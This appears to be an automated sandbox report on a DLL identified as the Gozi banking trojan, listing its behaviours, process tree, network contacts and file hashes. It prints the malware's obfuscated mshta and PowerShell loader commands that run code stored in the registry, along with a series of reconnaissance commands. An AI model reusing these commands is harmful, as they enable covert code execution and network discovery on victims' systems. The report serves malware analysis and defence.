Analysis Overview
SHA256
982ff4dcc3dc076b3c40f5cd5993d05f7578dd83b631146105b3840864c76203
Threat Level: Known bad
The file 62ea3f935563b.dll was found to be: Known bad.
Malicious Activity Summary
Gozi, Gozi IFSB
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Enumerates processes with tasklist
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: MapViewOfSection
Suspicious use of SetWindowsHookEx
Gathers system information
Discovers systems in the same network
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-08-03 09:30
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-08-03 09:30
Reported
2022-08-03 09:32
Platform
win7-20220715-en
Max time kernel
41s
Max time network
44s
Command Line
Signatures
Gozi, Gozi IFSB
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1064 wrote to memory of 1660 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1064 wrote to memory of 1660 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1064 wrote to memory of 1660 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1064 wrote to memory of 1660 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1064 wrote to memory of 1660 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1064 wrote to memory of 1660 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1064 wrote to memory of 1660 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll
Network
Files
memory/1064-54-0x000007FEFC251000-0x000007FEFC253000-memory.dmp
memory/1660-55-0x0000000000000000-mapping.dmp
memory/1660-56-0x00000000760E1000-0x00000000760E3000-memory.dmp
memory/1660-57-0x0000000010000000-0x000000001000E000-memory.dmp
memory/1660-63-0x0000000000190000-0x000000000019D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-08-03 09:30
Reported
2022-08-03 09:32
Platform
win10v2004-20220721-en
Max time kernel
151s
Max time network
126s
Command Line
Signatures
Gozi, Gozi IFSB
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3176 set thread context of 2308 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 2308 set thread context of 3412 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2308 set thread context of 3720 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2308 set thread context of 1676 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2308 set thread context of 3972 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2308 set thread context of 4872 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe |
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Oeh7='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Oeh7).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\53818B71-9696-FD5C-3837-2A81EC5BFE45\\\SystemText'));if(!window.flag)close()</script>"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xbxdiov -value gp; new-alias -name ivvusty -value iex; ivvusty ([System.Text.Encoding]::ASCII.GetString((xbxdiov "HKCU:Software\AppDataLow\Software\Microsoft\53818B71-9696-FD5C-3837-2A81EC5BFE45").StopName))
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uxx4ugcp\uxx4ugcp.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5043.tmp" "c:\Users\Admin\AppData\Local\Temp\uxx4ugcp\CSC388BE5BBA5B64FC4AA63A22663A459CB.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iolzmld3\iolzmld3.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES513D.tmp" "c:\Users\Admin\AppData\Local\Temp\iolzmld3\CSCACAD3E6DBCBF48B79E53F981574095C0.TMP"
C:\Windows\system32\cmd.exe
cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get domain
C:\Windows\system32\more.com
more
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\driverquery.exe
driverquery.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\net.exe
net config workstation
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\net.exe
net view /all /domain
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\net.exe
net view /all
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\5402.bin1 > C:\Users\Admin\AppData\Local\Temp\5402.bin & del C:\Users\Admin\AppData\Local\Temp\5402.bin1"
Network
| Country | Destination | Domain | Proto |
| US | 13.107.42.16:80 | config.edge.skype.com | tcp |
| FR | 2.18.109.224:443 | tcp | |
| US | 104.208.16.88:443 | tcp | |
| RO | 37.120.206.71:80 | 37.120.206.71 | tcp |
| BE | 8.238.110.126:80 | tcp | |
| BE | 8.238.110.126:80 | tcp | |
| BE | 8.238.110.126:80 | tcp | |
| RU | 5.42.199.72:80 | 5.42.199.72 | tcp |
| RO | 37.120.206.91:80 | 37.120.206.91 | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp |
Files
memory/2732-130-0x0000000000000000-mapping.dmp
memory/2732-131-0x0000000010000000-0x000000001000E000-memory.dmp
memory/2732-136-0x00000000013D0000-0x00000000013DD000-memory.dmp
memory/3176-140-0x0000000000000000-mapping.dmp
memory/3176-141-0x00000184D1AC0000-0x00000184D1AE2000-memory.dmp
memory/3176-142-0x00007FFDD1FD0000-0x00007FFDD2A91000-memory.dmp
memory/1900-143-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\uxx4ugcp\uxx4ugcp.cmdline
| MD5 | a8718937ef61364b1ff01a0f558f88fb |
| SHA1 | b10850b439ae43950469eddf2d2e44b9d04bd2fb |
| SHA256 | 57f89a996df4e7e44e7b2f31c3dcf1134b2d46f785bc63bf314940842f1aa2c0 |
| SHA512 | 0db3ea1e1c3b54537407321b02d64062a56faf40059e206ae4fb28df1c7b6c6234197bd05456642bb25e1d362d3b53a729c1c99d8366dd6c4da21040f54c29ea |
\??\c:\Users\Admin\AppData\Local\Temp\uxx4ugcp\uxx4ugcp.0.cs
| MD5 | 9a10482acb9e6952b96f4efc24d9d783 |
| SHA1 | 5cfc9bf668351df25fcda98c3c2d0bb056c026c3 |
| SHA256 | a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377 |
| SHA512 | e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28 |
memory/3472-146-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\uxx4ugcp\CSC388BE5BBA5B64FC4AA63A22663A459CB.TMP
| MD5 | 13c40549927ecb565a68080079adeedf |
| SHA1 | 97337504d2c448e0802c67fa34e4472f03a9011f |
| SHA256 | 7e20b13cb6ba9ed1312daf7a2548741712dcf54fe72ccbaa751ab1d1991761bf |
| SHA512 | 972e4cbb137a1969dc3fc4cf22c65c43cbfc6f1cfccc5875953d35a02bfa321c7a345a8f639e2727350db6c96428238619ad089ca0f28137dc9eefa9cff16b3d |
C:\Users\Admin\AppData\Local\Temp\RES5043.tmp
| MD5 | 4a122eee466af995b7a1d8924beffb42 |
| SHA1 | b10f5efaa7f55d317a8614fdee1c57fde080805c |
| SHA256 | b9f61a5ff377549992dac2f1b55ff75626b8661ac0e16b9324ab020baffef3b7 |
| SHA512 | df0542d6cefa9ad1a23aef27c6738249fc0390dd8ae8ccca71d62b660ba4693130535774647606f32cef1c131c7b95a41f056addff6cac6a1e9f553f60ae4aa9 |
C:\Users\Admin\AppData\Local\Temp\uxx4ugcp\uxx4ugcp.dll
| MD5 | 75aa4748f3e6e6d709b8b1bbce3e58d6 |
| SHA1 | b1a9cb016fd7dcbabb8426cd58fa383b3498c254 |
| SHA256 | a5fd7722a679294932263c268a88db7008c6df49dd6a4f1677c358be6f268deb |
| SHA512 | 23300e7f347a6c94b7a6f5103e0d46b1498e4a478b9be3537108e5b88dea48471fc5193584d3b28f2dcc025cbda6d0627ffd5bf60135d232ab4b545c2aa9da99 |
memory/3756-150-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\iolzmld3\iolzmld3.cmdline
| MD5 | 2398ccec5a25485d6042481ef7559a3a |
| SHA1 | 71e68ee684d643f355e65433ad2acf2f6f242863 |
| SHA256 | 3af15a6c0999fe9ba0bc6ddd67dee3bc0c1003a0b71c3eb94c6c2d1ac8db90fd |
| SHA512 | ab5e61cdfef3e622e35fa6bb4ef07bcb437471f692749649a817cbd9f4b3aa89402f629c86b160544febef3f8226b46ede35d571d152c0ef390cef504b0a30ba |
\??\c:\Users\Admin\AppData\Local\Temp\iolzmld3\iolzmld3.0.cs
| MD5 | aca9704199c51fde14b8bf8165bc2a4c |
| SHA1 | 789b408ccad29240bd093515cbd19a199ad2c1c8 |
| SHA256 | cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27 |
| SHA512 | a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6 |
memory/2496-153-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\iolzmld3\CSCACAD3E6DBCBF48B79E53F981574095C0.TMP
| MD5 | f8fbea95306639b9adfe5d4913a163fc |
| SHA1 | 25cdc0c5839ca541de0f2024635d88d201143424 |
| SHA256 | 6817c040bcad74ce38c95cf8804e7fcb0083575c6db2825783e1c04fa9b1e91c |
| SHA512 | 51a31f52d1a368a40dfd06d528a3f55215439b2eec9dc2bf28d6ec0aee51cd3d02f6b8af82a83a0713aabf3e2a687517354fd4f5eda90d0ba9b1c8d0725f05fc |
C:\Users\Admin\AppData\Local\Temp\RES513D.tmp
| MD5 | ca6364963d0e10b3f9430f798562d089 |
| SHA1 | 8096e5a8e3c65cf7c178204ea92f3d66ac16babd |
| SHA256 | 0e2177f33b076c4d61909766d71cf6ffa6080c42a25cd5198c86be36976936fe |
| SHA512 | 156ef898d22de0c4a90cfc4d48332e7328e53603d52d669c731b7f904acf6f0bbdb19a97a37b1c99c7ad015c27420fc26075cca6e1598e976d07dd7370ca8f4c |
C:\Users\Admin\AppData\Local\Temp\iolzmld3\iolzmld3.dll
| MD5 | 7380ea8a6308480b56661d8171a72f38 |
| SHA1 | 2acc510489147a6cbd8b7b99c983ed016d4319d2 |
| SHA256 | a35454500dbfacdb763ae98d06cc202efcfb6b14551c430054ad40949d9a8a99 |
| SHA512 | 1e35e97de56938fb78035de57aa6b5e6ae1da30f2e3871f59286c48f1d349c072c0e9ff162823f81064f2b6d78a3e0ea5a1fd4832e3c239e416e18086fc5eb76 |
memory/3176-157-0x00000184EB9A0000-0x00000184EB9DD000-memory.dmp
memory/3176-158-0x00007FFDD1FD0000-0x00007FFDD2A91000-memory.dmp
memory/3176-159-0x00000184EB9A0000-0x00000184EB9DD000-memory.dmp
memory/3412-160-0x0000012777C80000-0x0000012777D23000-memory.dmp
memory/4872-163-0x0000000000000000-mapping.dmp
memory/3720-162-0x000001842F290000-0x000001842F333000-memory.dmp
memory/2308-164-0x00000000092E0000-0x0000000009383000-memory.dmp
memory/4856-161-0x0000000000000000-mapping.dmp
memory/1676-165-0x00000216AE550000-0x00000216AE5F3000-memory.dmp
memory/4600-167-0x0000000000000000-mapping.dmp
memory/3972-166-0x00000290C22E0000-0x00000290C2383000-memory.dmp
memory/2928-168-0x0000000000000000-mapping.dmp
memory/4872-169-0x0000000000126B20-0x0000000000126B24-memory.dmp
memory/4872-170-0x0000000001600000-0x0000000001696000-memory.dmp
memory/2016-171-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5402.bin1
| MD5 | f7aea2435aa888b709ca20f816c33bfd |
| SHA1 | 38717c9a73b5f8bd399839cbe0aa57518427e758 |
| SHA256 | f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5 |
| SHA512 | 1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232 |
memory/3696-173-0x0000000000000000-mapping.dmp
memory/2308-174-0x000000000B670000-0x000000000B7AB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5402.bin1
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/3948-179-0x0000000000000000-mapping.dmp
memory/2308-180-0x0000000008DD0000-0x0000000008F0A000-memory.dmp
memory/1752-184-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5402.bin1
| MD5 | 45e2f8c6c0f4ca2bf474ff5611613c3c |
| SHA1 | 03766264e59200ea00076eb884a0e060597534f6 |
| SHA256 | ddb2002b82a3d4caa1e52cd0c3c66d87605a758498638d75e5fc4475c154d8c5 |
| SHA512 | 23b178e0b9fd15fdd550838e4271c66c730148af47cecb624311dbfa90c4e985bfacfa305f6459f3f1194ea2f998c71880e3bbcb781770a40138c7222295f04f |
memory/4668-186-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5402.bin1
| MD5 | 45e2f8c6c0f4ca2bf474ff5611613c3c |
| SHA1 | 03766264e59200ea00076eb884a0e060597534f6 |
| SHA256 | ddb2002b82a3d4caa1e52cd0c3c66d87605a758498638d75e5fc4475c154d8c5 |
| SHA512 | 23b178e0b9fd15fdd550838e4271c66c730148af47cecb624311dbfa90c4e985bfacfa305f6459f3f1194ea2f998c71880e3bbcb781770a40138c7222295f04f |
memory/3428-188-0x0000000000000000-mapping.dmp
memory/2308-189-0x00000000092E0000-0x0000000009383000-memory.dmp
memory/1300-190-0x0000000000000000-mapping.dmp
memory/1980-191-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5402.bin1
| MD5 | 28c5857b9d6bf0183723449cd9440a02 |
| SHA1 | 77fed5079cf0ccc7b731718c47393b8120d26668 |
| SHA256 | 2511cc082c53cf52b652903951746353b6ab39ab35ea05a63a3413af22bfe15a |
| SHA512 | 902f1ce5fddfeddf083c483f1031f81cb734685e61abecb223290ad278b828d76ea8fca1ef4d4fec19cfa5a4934e0933a283e6c1a1f7f036843d75aec604634c |
memory/4288-193-0x0000000000000000-mapping.dmp
memory/4648-194-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5402.bin1
| MD5 | 91e8d8629059d044757c002fdb30f7f6 |
| SHA1 | 5d427d6bd6d8d1d3c487f1657838a986f9202919 |
| SHA256 | f2992e2a303c30193752f7b4bc9375bbd551c4a6b7ba2c084757b4f377a80611 |
| SHA512 | ac5fd198fadccf0c3bc94e3bb572d6aee3fa2451880ca5058891fb909292fc3d152e76e8c7fe43dad6aa9b03ca48b70b7e8e4c1ce6ba3e2bdeb09cc6e65dede3 |
memory/4220-196-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5402.bin1
| MD5 | ed3204561a6ea836f028293bb7f87d0e |
| SHA1 | 454c6de92d2598d3136f0e795605af4208ef73b1 |
| SHA256 | 5e4a5f745f981b32aaa0098512830eeb8ce469c240ef67b72920744e2bc3125e |
| SHA512 | 7b2ac1146b184a453913fb2613a7d58cf58572032530d730edc29a463e5109f1976d1d6818ec62cc3590401ec852351f3eef2c01394396e5d4d942492b6471b1 |
memory/4276-198-0x0000000000000000-mapping.dmp
memory/2416-199-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5402.bin1
| MD5 | c7717d124e952b31f3633e08b2abc64f |
| SHA1 | 16381f605672bc938bca863c1c61def0e5ebd072 |
| SHA256 | b1844a2796b2839fb139f67671dc001927e7796dcfa8718efd670ef213e34e2d |
| SHA512 | 236f330551bf4079c677bef136190079d8047c90b8b1bcb7b36f75412288ef0af249cd7eec3c781f08616833a12ac295b76758ba6660fce080cca15acceb23c4 |
memory/924-201-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5402.bin1
| MD5 | 19527b811ed093250808107d2e2de1ed |
| SHA1 | 58837f3e17828de5e571ac0d41c4de838c84e4ce |
| SHA256 | d611bded828bea92f39edba187f02924082c50b5836b3bbd2ed3cc57d8afe054 |
| SHA512 | fa604ebf5bee1ed9e45faf0899cfb135608338df4dd7595483bc4a183719252b47962db5ec04d2450a8d556b0b2a1bcd9c514ce4eba1c7e5b80154e7c5894428 |
memory/4616-203-0x0000000000000000-mapping.dmp
memory/5080-204-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5402.bin1
| MD5 | 3f59a671f7f4a34d7dcdc45ce94b4ab9 |
| SHA1 | e1e0cf155d645fa9b092e1f6b53a2435f7207130 |
| SHA256 | f8d44bbba2c5499ce8b111dfa28336a618cda25d4f37443ff777bb2c3881bee6 |
| SHA512 | a42a33385a796c2a131f3a9a1363897154ff7a8d71a22ce7437ae358b75a5149b1e68a369c87f509cc4f95848adfe8405f5cf6f6fff63d4054c0b7e451829884 |
memory/3600-206-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5402.bin1
| MD5 | 3f59a671f7f4a34d7dcdc45ce94b4ab9 |
| SHA1 | e1e0cf155d645fa9b092e1f6b53a2435f7207130 |
| SHA256 | f8d44bbba2c5499ce8b111dfa28336a618cda25d4f37443ff777bb2c3881bee6 |
